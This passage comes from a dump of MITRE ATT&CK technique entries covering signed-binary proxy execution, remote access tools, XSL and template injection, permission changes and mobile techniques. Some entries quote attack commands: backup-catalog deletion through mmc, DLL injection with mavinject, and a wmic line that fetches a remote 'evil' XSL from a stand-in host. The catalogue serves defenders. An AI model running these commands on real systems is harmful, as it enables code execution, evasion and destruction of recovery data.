                              'Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be '
                              'abused to perform import descriptor injection via its  <code>/HMODULE</code> '
                              'command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL '
                              'ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of '
                              'the specified DLL into the module at the given base address.(Citation: Mavinject '
                              'Functionality Deconstructed)',
               'name': 'Mavinject',
               'platforms': ['Windows']},
 'T1218.014': {'attack_id': 'T1218.014',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft '
                              'Management Console (MMC) is a binary that may be signed by Microsoft and is used in '
                              'several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: '
                              'what_is_mmc) MMC can be used to create, open, and save custom consoles that contain '
                              'administrative tools created by Microsoft, called snap-ins. These snap-ins may be used '
                              'to manage Windows systems locally or remotely. MMC can also be used to open Microsoft '
                              'created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n'
                              '\n'
                              'For example, <code>mmc C:\\Users\\foo\\admintools.msc /a</code> will open a custom, '
                              'saved console msc file in author mode.(Citation: win_mmc) Another common example is '
                              '<code>mmc gpedit.msc</code>, which will open the Group Policy Editor application '
                              'window. \n'
                              '\n'
                              'Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc '
                              'wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. '
                              '[Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts '
                              'to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows '
                              'Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: '
                              'phobos_virustotal)\n'
                              '\n'
                              'Adversaries may also abuse MMC to execute malicious .msc files. For example, '
                              'adversaries may first create a malicious registry Class Identifier (CLSID) subkey, '
                              'which uniquely identifies a [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: '
                              'win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web '
                              'Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) '
                              'Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with '
                              'the following command: <code>mmc.exe -Embedding '
                              'C:\\path\\to\\test.msc</code>.(Citation: abusing_com_reg)',
               'name': 'MMC',
               'platforms': ['Windows']},
 'T1218.015': {'attack_id': 'T1218.015',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse components of the Electron framework to execute malicious code. '
                              'The Electron framework hosts many common applications such as Signal, Slack, and '
                              'Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a '
                              'cross-platform desktop application development framework that employs web technologies '
                              'like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to '
                              'display web content and Node.js runs the backend code.(Citation: Electron 1)\n'
                              '\n'
                              'Due to the functional mechanics of Electron (such as allowing apps to run arbitrary '
                              'commands), adversaries may also be able to perform malicious functions in the '
                              'background potentially disguised as legitimate tools within the framework.(Citation: '
                              'Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow '
                              'adversaries to execute malicious commands as child processes of the legitimate '
                              'application (e.g., `chrome.exe --disable-gpu-sandbox '
                              '--gpu-launcher="C:\\Windows\\system32\\cmd.exe /c calc.exe`).(Citation: Electron 6-8)\n'
                              '\n'
                              'Adversaries may also execute malicious content by planting malicious '
                              '[JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron '
                              'applications.(Citation: Electron Security)',
               'name': 'Electron Applications',
               'platforms': ['macOS', 'Windows', 'Linux']},
 'T1219': {'attack_id': 'T1219',
           'categories': ['command-and-control'],
           'description': 'An adversary may use legitimate desktop support and remote access software to establish an '
                          'interactive command and control channel to target systems within networks. These services, '
                          'such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and '
                          'other remote monitoring and management (RMM) tools, are commonly used as legitimate '
                          'technical support software and may be allowed by application control within a target '
                          'environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global '
                          'Threat Report)(Citation: CrySyS Blog TeamSpy)\n'
                          '\n'
                          'Remote access software may be installed and used post-compromise as an alternate '
                          'communications channel for redundant access or as a way to establish an interactive remote '
                          'desktop session with the target system. They may also be used as a component of malware to '
                          'establish a reverse connection or back-connect to a service or adversary-controlled '
                          'system.\n'
                          ' \n'
                          'Adversaries may similarly abuse response features included in EDR and other defensive tools '
                          'that enable remote access.\n'
                          '\n'
                          'Installation of many remote access software may also include persistence (e.g., the '
                          "software's installation routine creates a [Windows "
                          'Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features '
                          'may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote '
                          'Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)',
           'name': 'Remote Access Software',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1220': {'attack_id': 'T1220',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may bypass application control and obscure execution of code by embedding '
                          'scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to '
                          'describe the processing and rendering of data within XML files. To support complex '
                          'operations, the XSL standard includes support for embedded scripting in various languages. '
                          '(Citation: Microsoft XSLT Script Mar 2017)\n'
                          '\n'
                          'Adversaries may abuse this functionality to execute arbitrary files while potentially '
                          'bypassing application control. Similar to [Trusted Developer Utilities Proxy '
                          'Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line '
                          'transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed '
                          'and used to execute malicious JavaScript embedded within local or remote (URL referenced) '
                          'XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not '
                          'installed by default, an adversary will likely need to package it with dropped files. '
                          '(Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML '
                          'source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call '
                          'the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files '
                          'an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n'
                          '\n'
                          'Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL '
                          'Bypass Mar 2019)\n'
                          '\n'
                          '* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n'
                          '* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n'
                          '* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n'
                          '\n'
                          'Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows '
                          'Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or '
                          'VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute '
                          'local/remote scripts and, similar to its '
                          '[Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, '
                          'leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows '
                          'Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they '
                          'utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n'
                          '\n'
                          'Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n'
                          '\n'
                          '* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n'
                          '* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>',
           'name': 'XSL Script Processing',
           'platforms': ['Windows']},
 'T1221': {'attack_id': 'T1221',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may create or modify references in user document templates to conceal malicious '
                          'code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) '
                          'specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to '
                          'replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP '
                          'archives compromised of various XML files, referred to as parts, containing properties that '
                          'collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n'
                          '\n'
                          'Properties within parts may reference shared public resources accessed via online URLs. For '
                          'example, template properties may reference a file, serving as a pre-formatted document '
                          'blueprint, that is fetched when the document is loaded.\n'
                          '\n'
                          'Adversaries may abuse these templates to initially conceal malicious code to be executed '
                          'via user documents. Template references injected into a document may enable malicious '
                          'payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian '
                          'Wiltse Template Injection) These documents can be delivered via other techniques such as '
                          '[Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared '
                          'Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since '
                          'no typical indicators (VBA macro, script, etc.) are present until after the malicious '
                          'payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen '
                          'in the wild where template injection was used to load malicious code containing an '
                          'exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n'
                          '\n'
                          'Adversaries may also modify the <code>*\\template</code> control word within an .rtf file '
                          'to similarly conceal then download malicious code. This legitimate control word value is '
                          'intended to be a file destination of a template file resource that is retrieved and loaded '
                          'when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf '
                          'file to insert a template control word field to include a URL resource of a malicious '
                          'payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious '
                          'RTF files)\n'
                          '\n'
                          'This technique may also enable [Forced '
                          'Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or '
                          'other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali '
                          'Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: '
                          'ryhanson phishery SEPT 2016)',
           'name': 'Template Injection',
           'platforms': ['Windows']},
 'T1222': {'attack_id': 'T1222',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may modify file or directory permissions/attributes to evade access control '
                          'lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June '
                          '2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are '
                          'commonly managed by ACLs configured by the file or directory owner, or users with the '
                          'appropriate permissions. File and directory ACL implementations vary by platform, but '
                          'generally explicitly designate which users or groups can perform which actions (read, '
                          'write, execute, etc.).\n'
                          '\n'
                          'Modifications may include changing specific access rights, which may require taking '
                          'ownership of a file or directory and/or elevated permissions depending on the file or '
                          'directory’s existing permissions. This may enable malicious activity such as modifying, '
                          'replacing, or deleting specific files or directories. Specific file and directory '
                          'modifications may be a required step for many techniques, such as establishing Persistence '
                          'via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon '
                          'Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell '
                          'Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or '
                          'tainting/hijacking other instrumental binary/configuration files via [Hijack Execution '
                          'Flow](https://attack.mitre.org/techniques/T1574).\n'
                          '\n'
                          'Adversaries may also change permissions of symbolic links. For example, malware '
                          '(particularly ransomware) may modify symbolic links and associated settings to enable '
                          'access to files from local shortcuts with remote paths.(Citation: '
                          'new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: '
                          'falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: '
                          'fsutil_behavior) ',
           'name': 'File and Directory Permissions Modification',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1222.001': {'attack_id': 'T1222.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file or directory permissions/attributes to evade access control '
                              'lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June '
                              '2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are '
                              'commonly managed by ACLs configured by the file or directory owner, or users with the '
                              'appropriate permissions. File and directory ACL implementations vary by platform, but '
                              'generally explicitly designate which users or groups can perform which actions (read, '
                              'write, execute, etc.).\n'
                              '\n'
                              'Windows implements file and directory ACLs as Discretionary Access Control Lists '
                              '(DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies '
                              'the accounts that are allowed or denied access to a securable object. When an attempt '
                              'is made to access a securable object, the system checks the access control entries in '
                              'the DACL in order. If a matching entry is found, access to the object is granted. '
                              'Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n'
                              '\n'
                              'Adversaries can interact with the DACLs using built-in Windows commands, such as '
                              '`icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher '
                              'permissions on specific files and folders. Further, '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can '
                              'be used to retrieve or modify file and directory DACLs. Specific file and directory '
                              'modifications may be a required step for many techniques, such as establishing '
                              'Persistence via [Accessibility '
                              'Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization '
                              'Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other '
                              'instrumental binary/configuration files via [Hijack Execution '
                              'Flow](https://attack.mitre.org/techniques/T1574).',
               'name': 'Windows File and Directory Permissions Modification',
               'platforms': ['Windows']},
 'T1222.002': {'attack_id': 'T1222.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file or directory permissions/attributes to evade access control '
                              'lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June '
                              '2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are '
                              'commonly managed by ACLs configured by the file or directory owner, or users with the '
                              'appropriate permissions. File and directory ACL implementations vary by platform, but '
                              'generally explicitly designate which users or groups can perform which actions (read, '
                              'write, execute, etc.).\n'
                              '\n'
                              'Most Linux and Linux-based platforms provide a standard set of permission groups (user, '
                              'group, and other) and a standard set of permissions (read, write, and execute) that are '
                              'applied to each group. While nuances of each platform’s permissions implementation may '
                              'vary, most of the platforms provide two primary commands used to manipulate file and '
                              'directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> '
                              '(short for change mode).\n'
                              '\n'
                              'Adversarial may use these commands to make themselves the owner of files and '
                              'directories or change the mode if current permissions allow it. They could subsequently '
                              'lock others out of the file. Specific file and directory modifications may be a '
                              'required step for many techniques, such as establishing Persistence via [Unix Shell '
                              'Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or '
                              'tainting/hijacking other instrumental binary/configuration files via [Hijack Execution '
                              'Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and '
                              'Techniques) ',
               'name': 'Linux and Mac File and Directory Permissions Modification',
               'platforms': ['macOS', 'Linux']},
 'T1398': {'attack_id': 'T1398',
           'categories': ['persistence'],
           'description': 'Adversaries may use scripts automatically executed at boot or logon initialization to '
                          'establish persistence. Initialization scripts are part of the underlying operating system '
                          'and are not accessible to the user unless the device has been rooted or jailbroken. ',
           'name': 'Boot or Logon Initialization Scripts',
           'platforms': ['Android', 'iOS']},
 'T1399': {'attack_id': 'T1399',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'If an adversary can escalate privileges, he or she may be able to use those privileges to '
                          "place malicious code in the device's Trusted Execution Environment (TEE) or other similar "
                          'isolated execution environment where the code can evade detection, may persist after device '
                          'resets, and may not be removable by the device user. Running code within the TEE may '
                          'provide an adversary with the ability to monitor or tamper with overall device '
                          'behavior.(Citation: Roth-Rootkits)',
           'name': 'Modify Trusted Execution Environment',
           'platforms': ['Android']},
 'T1403': {'attack_id': 'T1403',
           'categories': ['persistence'],
           'description': 'ART (the Android Runtime) compiles optimized code on the device itself to improve '
                          'performance. An adversary may be able to use escalated privileges to modify the cached code '
                          'in order to hide malicious behavior. Since the code is compiled on the device, it may not '
                          'receive the same level of integrity checks that are provided to code running in the system '
                          'partition.(Citation: Sabanal-ART)',
           'name': 'Modify Cached Executable Code',
           'platforms': ['Android']},
 'T1404': {'attack_id': 'T1404',
           'categories': ['privilege-escalation'],
           'description': 'Adversaries may exploit software vulnerabilities in order to elevate privileges. '
                          'Exploitation of a software vulnerability occurs when an adversary takes advantage of a '
                          'programming error in an application, service, within the operating system software, or '
                          'kernel itself to execute adversary-controlled code. Security constructions, such as '
                          'permission levels, will often hinder access to information and use of certain techniques. '
                          'Adversaries will likely need to perform privilege escalation to include use of software '
                          'exploitation to circumvent those restrictions. \n'
                          '\n'
                          'When initially gaining access to a device, an adversary may be operating within a lower '
                          'privileged process which will prevent them from accessing certain resources on the system. '
                          'Vulnerabilities may exist, usually in operating system components and applications running '
                          'at higher permissions, that can be exploited to gain higher levels of access on the system. '
                          'This could enable someone to move from unprivileged or user- level permission to root '
                          'permissions depending on the component that is vulnerable. ',
           'name': 'Exploitation for Privilege Escalation',
           'platforms': ['Android', 'iOS']},
 'T1405': {'attack_id': 'T1405',
           'categories': ['credential-access', 'privilege-escalation'],
           'description': 'A malicious app or other attack vector could be used to exploit vulnerabilities in code '
                          'running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The '
                          'adversary could then obtain privileges held by the TEE potentially including the ability to '
                          'access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated '
                          'operating system privileges may be first required in order to have the ability to attack '
                          'the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to '
                          'exploit the operating system (Citation: laginimaineb-TEE).',
           'name': 'Exploit TEE Vulnerability',
           'platforms': ['Android']},
 'T1406': {'attack_id': 'T1406',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may attempt to make a payload or file difficult to discover or analyze by '
                          'encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. '
                          'This is common behavior that can be used across different platforms and the network to '
                          'evade defenses. \n'
                          ' \n'
                          'Payloads may be compressed, archived, or encrypted in order to avoid detection. These '
                          'payloads may be used during Initial Access or later to mitigate detection. Portions of '
                          'files can also be encoded to hide the plaintext strings that would otherwise help defenders '
                          'with discovery. Payloads may also be split into separate, seemingly benign files that only '
                          'reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB) ',
           'name': 'Obfuscated Files or Information',
           'platforms': ['Android', 'iOS']},
 'T1406.001': {'attack_id': 'T1406.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use steganography techniques in order to prevent the detection of '
                              'hidden information. Steganographic techniques can be used to hide data in digital media '
                              'such as images, audio tracks, video clips, or text files.',
               'name': 'Steganography',
               'platforms': ['Android']},
 'T1406.002': {'attack_id': 'T1406.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may perform software packing to conceal their code. Software packing is a '
                              'method of compressing or encrypting an executable. Packing an executable changes the '
                              'file signature in an attempt to avoid signature-based detection. Most decompression '
                              'techniques decompress the executable code in memory. \n'
                              '\n'
                              'Utilities used to perform software packing are called packers. An example packer is '
                              'FTT. A more comprehensive list of known packers is available, but adversaries may '
                              'create their own packing techniques that do not leave the same artifacts as well-known '
                              'packers to evade defenses.',
               'name': 'Software Packing',
               'platforms': ['iOS', 'Android']},
 'T1407': {'attack_id': 'T1407',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may download and execute dynamic code not included in the original application '
                          'package after installation. This technique is primarily used to evade static analysis '
                          'checks and pre-publication scans in official app stores. In some cases, more advanced '
                          'dynamic or behavioral analysis techniques could detect this behavior. However, in '
                          'conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) '
                          'techniques, detecting malicious code downloaded after installation could be difficult.\n'
                          '\n'
                          'On Android, dynamic code could include native code, Dalvik code, or JavaScript code that '
                          'utilizes Android WebView’s `JavascriptInterface` capability. \n'
                          '\n'
                          'On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as '
                          'JSPatch. (Citation: FireEye-JSPatch) ',
           'name': 'Download New Code at Runtime',
           'platforms': ['Android', 'iOS']},
 'T1409': {'attack_id': 'T1409',
           'categories': ['collection'],
           'description': 'Adversaries may try to access and collect application data resident on the device. '
                          'Adversaries often target popular applications, such as Facebook, WeChat, and '
                          'Gmail.(Citation: SWB Exodus March 2019) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Due to mobile OS sandboxing, this technique is only possible in three scenarios: \n'
                          '\n'
                          ' \n'
                          '\n'
                          '* An application stores files in unprotected external storage \n'
                          '* An application stores files in its internal storage directory with insecure permissions '
                          '(e.g. 777) \n'
                          '* The adversary gains root permissions on the device ',
           'name': 'Stored Application Data',
           'platforms': ['Android', 'iOS']},
 'T1413': {'attack_id': 'T1413',
           'categories': ['collection', 'credential-access'],
           'description': 'On versions of Android prior to 4.1, an adversary may use a malicious application that '
                          'holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or '
                          "other sensitive data stored in the device's system log. On Android 4.1 and later, an "
                          'adversary would need to attempt to perform an operating system privilege escalation attack '
                          'to be able to access the log.',
           'name': 'Access Sensitive Data in Device Logs',
           'platforms': ['Android']},
 'T1414': {'attack_id': 'T1414',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the '
                          'device clipboard. For example, passwords being copied and pasted from a password manager '
                          'application could be captured by a malicious application installed on the device.(Citation: '
                          'Fahl-Clipboard) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On Android, applications can use the `ClipboardManager.OnPrimaryClipChangedListener()` API '
                          'to register as a listener and monitor the clipboard for changes. However, starting in '
                          'Android 10, this can only be used if the application is in the foreground, or is set as the '
                          'device’s default input method editor (IME).(Citation: Github Capture Clipboard '
                          '2019)(Citation: Android 10 Privacy Changes) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On iOS, this can be accomplished by accessing the `UIPasteboard.general.string` field. '
                          'However, starting in iOS 14, upon accessing the clipboard, the user will be shown a system '
                          'notification if the accessed text originated in a different application. For example, if '
                          'the user copies the text of an iMessage from the Messages application, the notification '
                          'will read “application_name has pasted from Messages” when the text was pasted in a '
                          'different application.(Citation: UIPPasteboard)',
           'name': 'Clipboard Data',
           'platforms': ['Android', 'iOS']},
 'T1417': {'attack_id': 'T1417',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may use methods of capturing user input to obtain credentials or collect '
                          'information. During normal device usage, users often provide credentials to various '
                          'locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may '
                          'be transparent to the user (e.g. '
                          '[Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user '
                          'into providing input into what they believe to be a genuine application prompt (e.g. [GUI '
                          'Input Capture](https://attack.mitre.org/techniques/T1417/002)).',
           'name': 'Input Capture',
           'platforms': ['Android', 'iOS']},
 'T1417.001': {'attack_id': 'T1417.001',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may log user keystrokes to intercept credentials or other information from '
                              'the user as the user types them.\n'
                              '\n'
                              'Some methods of keylogging include:\n'
                              '\n'
                              '* Masquerading as a legitimate third-party keyboard to record user '
                              'keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly '
                              'authorize the use of third-party keyboard apps. Users should be advised to use extreme '
                              'caution before granting this authorization when it is requested.\n'
                              '* Abusing accessibility features. On Android, adversaries may abuse accessibility '
                              'features to record keystrokes by registering an `AccessibilityService` class, '
                              'overriding the `onAccessibilityEvent` method, and listening for the '
                              '`AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed into '
                              'the function will contain the data that the user typed. \n'
                              '*Additional methods of keylogging may be possible if root access is available. \n',
               'name': 'Keylogging',
               'platforms': ['Android', 'iOS']},
 'T1417.002': {'attack_id': 'T1417.002',
               'categories': ['credential-access', 'collection'],
               'description': 'Adversaries may mimic common operating system GUI components to prompt users for '
                              'sensitive information with a seemingly legitimate prompt. The operating system and '
                              'installed applications often have legitimate needs to prompt the user for sensitive '
                              'information such as account credentials, bank account information, or Personally '
                              'Identifiable Information (PII). Compared to traditional PCs, the constrained display '
                              'size of mobile devices may impair the ability to provide users with contextual '
                              'information, making users more susceptible to this technique’s use.(Citation: '
                              'Felt-PhishingOnMobileDevices)\n'
                              '\n'
                              'There are several approaches adversaries may use to mimic this functionality. '
                              'Adversaries may impersonate the identity of a legitimate application (e.g. use the same '
                              'application name and/or icon) and, when installed on the device, may prompt the user '
                              'for sensitive information.(Citation: eset-finance) Adversaries may also send fake '
                              'device notifications to the user that may trigger the display of an input prompt when '
                              'clicked.(Citation: Group IB Gustuff Mar 2019) \n'
                              '\n'
                              'Additionally, adversaries may display a prompt on top of a running, legitimate '
                              'application to trick users into entering sensitive information into a malicious '
                              'application rather than the legitimate application. Typically, adversaries need to know '
                              'when the targeted application and the individual activity within the targeted '
                              'application is running in the foreground to display the prompt at the proper time. '
                              'Adversaries can abuse Android’s accessibility features to determine which application '
                              'is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches '
                              'to displaying a prompt include:\n'
                              '\n'
                              '* Adversaries start a new activity on top of a running legitimate '
                              'application.(Citation: Felt-PhishingOnMobileDevices)(Citation: '
                              'Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an '
                              'application to start a new activity on top of another application, which may make it '
                              'more difficult for adversaries to utilize this technique.(Citation: Android '
                              'Background)\n'
                              '* Adversaries create an application overlay window on top of a running legitimate '
                              'application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create '
                              'overlay windows. This permission is handled differently than typical Android '
                              'permissions and, at least under certain conditions, is automatically granted to '
                              'applications installed from the Google Play Store.(Citation: Cloak and '
                              'Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The '
                              '`SYSTEM_ALERT_WINDOW` permission and its associated ability to create application '
                              'overlay windows are expected to be deprecated in a future release of Android in favor '
                              'of a new API.(Citation: XDA Bubbles)',
               'name': 'GUI Input Capture',
               'platforms': ['Android', 'iOS']},
 'T1418': {'attack_id': 'T1418',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of applications that are installed on a device. '
                          'Adversaries may use the information from [Software '
                          'Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape '
                          'follow-on behaviors, including whether or not to fully infect the target and/or attempts '
                          'specific actions. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Adversaries may attempt to enumerate applications for a variety of reasons, such as '
                          'figuring out what security measures are present or to identify the presence of target '
                          'applications. ',
           'name': 'Software Discovery',
           'platforms': ['Android', 'iOS']},
 'T1418.001': {'attack_id': 'T1418.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of security applications and configurations '
                              'that are installed on a device. This may include things such as mobile security '
                              'products. Adversaries may use the information from [Security Software '
                              'Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to '
                              'shape follow-on behaviors, including whether or not to fully infect the target and/or '
                              'attempt specific actions. ',
               'name': 'Security Software Discovery',
               'platforms': ['Android', 'iOS']},
 'T1420': {'attack_id': 'T1420',
           'categories': ['discovery'],
           'description': 'Adversaries may enumerate files and directories or search in specific device locations for '
                          'desired information within a filesystem. Adversaries may use the information from [File and '
                          'Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery '
                          'to shape follow-on behaviors, including deciding if the adversary should fully infect the '
                          'target and/or attempt specific actions. \n'
                          '\n'
                          'On Android, Linux file permissions and SELinux policies typically stringently restrict what '
                          'can be accessed by apps without taking advantage of a privilege escalation exploit. The '
                          'contents of the external storage directory are generally visible, which could present '
                          "concerns if sensitive data is inappropriately stored there. iOS's security architecture "
                          'generally restricts the ability to perform any type of [File and Directory '
                          'Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges. ',
           'name': 'File and Directory Discovery',
           'platforms': ['Android', 'iOS']},
 'T1421': {'attack_id': 'T1421',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of network connections to or from the compromised '
                          'device they are currently accessing or from remote systems by querying for information over '
                          'the network. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'This is typically accomplished by utilizing device APIs to collect information about nearby '
                          'networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be '
                          'done by querying the respective APIs: \n'
                          '\n'
                          ' \n'
                          '\n'
                          '* `WifiInfo` for information about the current Wi-Fi connection, as well as nearby Wi-Fi '
                          'networks. Querying the `WiFiInfo` API requires the application to hold the '
                          '`ACCESS_FINE_LOCATION` permission. \n'
                          '\n'
                          '* `BluetoothAdapter` for information about Bluetooth devices, which also requires the '
                          'application to hold several permissions granted by the user at runtime. \n'
                          '\n'
                          '* For Android versions prior to Q, applications can use the '
                          '`TelephonyManager.getNeighboringCellInfo()` method. For Q and later, applications can use '
                          'the `TelephonyManager.getAllCellInfo()` method. Both methods require the application hold '
                          'the `ACCESS_FINE_LOCATION` permission.',
           'name': 'System Network Connections Discovery',
           'platforms': ['Android']},
 'T1422': {'attack_id': 'T1422',
           'categories': ['discovery'],
           'description': 'Adversaries may look for details about the network configuration and settings, such as IP '
                          'and/or MAC addresses, of devices they access or through information discovery of remote '
                          'systems. \n'
                          '\n'
                          'Adversaries may use the information from [System Network Configuration '
                          'Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape '
                          'follow-on behaviors, including determining certain access within the target network and '
                          'what actions to do next. \n'
                          '\n'
                          'On Android, details of onboard network interfaces are accessible to apps through the '
                          '`java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android '
                          '`TelephonyManager` class could be used to gather telephony-related device identifiers, '
                          'information such as the IMSI, IMEI, and phone number. However, starting with Android 10, '
                          'only preloaded, carrier, the default SMS, or device and profile owner applications can '
                          'access the telephony-related device identifiers.(Citation: TelephonyManager) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On iOS, gathering network configuration information is not possible without root access. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Adversaries may use the information from [System Network Configuration '
                          'Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape '
                          'follow-on behaviors, including determining certain access within the target network and '
                          'what actions to do next. ',
           'name': 'System Network Configuration Discovery',
           'platforms': ['Android', 'iOS']},
 'T1422.001': {'attack_id': 'T1422.001',
               'categories': ['discovery'],
               'description': 'Adversaries may check for Internet connectivity on compromised systems. This may be '
                              'performed during automated discovery and can be accomplished in numerous ways such as '
                              'using `adb shell netstat` for Android.(Citation: adb_commands)\n'
